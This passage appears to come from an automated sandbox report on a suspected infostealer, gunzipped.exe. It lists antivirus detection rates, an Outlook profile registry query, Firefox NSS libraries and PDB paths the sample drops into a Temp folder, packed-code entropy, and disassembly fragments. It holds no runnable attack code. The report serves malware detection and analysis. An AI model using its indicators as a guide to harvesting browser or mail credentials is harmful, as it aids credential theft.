                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: gunzipped.exe | Virustotal: Detection: 55%
                    Source: gunzipped.exe | ReversingLabs: Detection: 75%
                    Source: unknown | Process created: C:\Users\user\Desktop\gunzipped.exe 'C:\Users\user\Desktop\gunzipped.exe'
                    Source: C:\Users\user\Desktop\gunzipped.exe | Process created: C:\Users\user\Desktop\gunzipped.exe {path}
                    Source: C:\Users\user\Desktop\gunzipped.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                    Source: C:\Users\user\Desktop\gunzipped.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                    Source: C:\Users\user\Desktop\gunzipped.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                    Source: gunzipped.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: C:\Users\user\Desktop\gunzipped.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: gunzipped.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274743641.0000000004128000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: gunzipped.exe, 00000003.00000003.269486087.0000000003728000.00000004.00000001.sdmp, mozglue.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, nss3.dll.3.dr
                    Source: Binary string: ucrtbase.pdb source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, ucrtbase.dll.3.dr
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: gunzipped.exe, 00000003.00000003.274290249.0000000004094000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: gunzipped.exe, 00000003.00000003.269240179.0000000003728000.00000004.00000001.sdmp, freebl3.dll.3.dr
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274208393.0000000004088000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268354039.0000000003728000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274723981.0000000004118000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268805106.0000000003724000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274632349.00000000040F4000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268332940.0000000003724000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.3.dr
                    Source: Binary string: vcruntime140.i386.pdbGCTL source: gunzipped.exe, 00000003.00000003.275951863.0000000003708000.00000004.00000001.sdmp, vcruntime140.dll.3.dr
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.282742497.00000000037FC000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: gunzipped.exe, 00000003.00000003.269486087.0000000003728000.00000004.00000001.sdmp, mozglue.dll.3.dr
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274290249.0000000004094000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268244527.0000000003724000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.282985286.00000000037F8000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: gunzipped.exe, 00000003.00000003.269240179.0000000003728000.00000004.00000001.sdmp, freebl3.dll.3.dr
                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.267552438.0000000003724000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274828166.000000000413C000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268528772.0000000003728000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr
                    Source: Binary string: msvcp140.i386.pdb source: gunzipped.exe, 00000003.00000003.275123945.000000000342C000.00000004.00000001.sdmp, msvcp140.dll.3.dr
                    Source: Binary string: ucrtbase.pdbUGP source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, ucrtbase.dll.3.dr
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268265315.0000000003724000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, nssdbm3.dll.3.dr
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274290249.0000000004094000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: gunzipped.exe, 00000003.00000003.268354039.0000000003728000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.282742497.00000000037FC000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274208393.0000000004088000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268451933.0000000003724000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274743641.0000000004128000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: gunzipped.exe, 00000003.00000003.275174463.00000000034A0000.00000004.00000001.sdmp, softokn3.dll.3.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: gunzipped.exe, 00000003.00000003.274537491.00000000040D8000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.3.dr
                    Source: Binary string: mscorrc.pdb source: gunzipped.exe, 00000001.00000002.262457843.0000000007360000.00000002.00000001.sdmp
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268657790.0000000003728000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.3.dr
                    Source: Binary string: vcruntime140.i386.pdb source: gunzipped.exe, 00000003.00000003.275951863.0000000003708000.00000004.00000001.sdmp, vcruntime140.dll.3.dr
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274537491.00000000040D8000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.3.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, nssdbm3.dll.3.dr
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274632349.00000000040F4000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.3.dr
                    Source: Binary string: msvcp140.i386.pdbGCTL source: gunzipped.exe, 00000003.00000003.275123945.000000000342C000.00000004.00000001.sdmp, msvcp140.dll.3.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274537491.00000000040D8000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: gunzipped.exe, 00000003.00000003.274290249.0000000004094000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274865988.0000000004150000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274375989.00000000040B0000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.274723981.0000000004118000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.3.dr
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: gunzipped.exe, 00000003.00000003.268805106.0000000003724000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.3.dr
                    Source: api-ms-win-core-console-l1-1-0.dll.3.dr | Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
                    Source: C:\Users\user\Desktop\gunzipped.exe | Code function: 3_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 3_2_00417216
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C580D5 push cs; ret 1_2_00C580D6
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C582E1 push cs; ret 1_2_00C582E2
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C58C6A push cs; ret 1_2_00C58C6B
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C58992 push cs; ret 1_2_00C58993
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C57A9C push cs; ret 1_2_00C57A9D
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C57D3E push cs; ret 1_2_00C57D3F
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C577BB push cs; ret 1_2_00C577BC
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_00C5863A push cs; ret 1_2_00C5863B
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016F87E4 pushfd ; retf 1_2_016F87E5
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 1_2_016FAEB5 push ds; retf 1_2_016FAEBC
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00404C1C push 00404C6Dh; ret 3_2_00404C65
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0041A068 push 0041A08Eh; ret 3_2_0041A086
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0041A02C push 0041A05Ch; ret 3_2_0041A054
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040E8D0 push 0040E905h; ret 3_2_0040E8FD
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040B164 push 0040B190h; ret 3_2_0040B188
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040E908 push 0040E94Ah; ret 3_2_0040E942
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040B12C push 0040B158h; ret 3_2_0040B150
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040C136 push 0040C164h; ret 3_2_0040C15C
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040C138 push 0040C164h; ret 3_2_0040C15C
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040813C push 00408174h; ret 3_2_0040816C
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_004171E8 push 00417214h; ret 3_2_0041720C
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040C9EA push 0040CA18h; ret 3_2_0040CA10
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040C9EC push 0040CA18h; ret 3_2_0040CA10
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040E1A4 push 0040E1D0h; ret 3_2_0040E1C8
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040B1B8 push 0040B1E4h; ret 3_2_0040B1DC
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040E25A push 0040E288h; ret 3_2_0040E280
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040E25C push 0040E288h; ret 3_2_0040E280
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00414A28 push 00414A84h; ret 3_2_00414A7C
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_0040BAB8 push 0040BAE4h; ret 3_2_0040BADC
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00409B54 push 00409BC8h; ret 3_2_00409BC0
                    Source: C:\Users\user\Desktop\gunzipped.exeCode function: 3_2_00409B78 push 00409BC8h; ret 3_2_00409BC0
                    Source: initial sample | Static PE information: section name: .text entropy: 7.97520833345
                    Source: C:\Users\user\Desktop\gunzipped.exe | File created: C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll
                    Source: C:\Users\user\Desktop\gunzipped.exe | File created: C:\Users\user\AppData\Local\Temp\2fda\api-ms-win-core-datetime-l1-1-0.dll
                    Source: C:\Users\user\Desktop\gunzipped.exe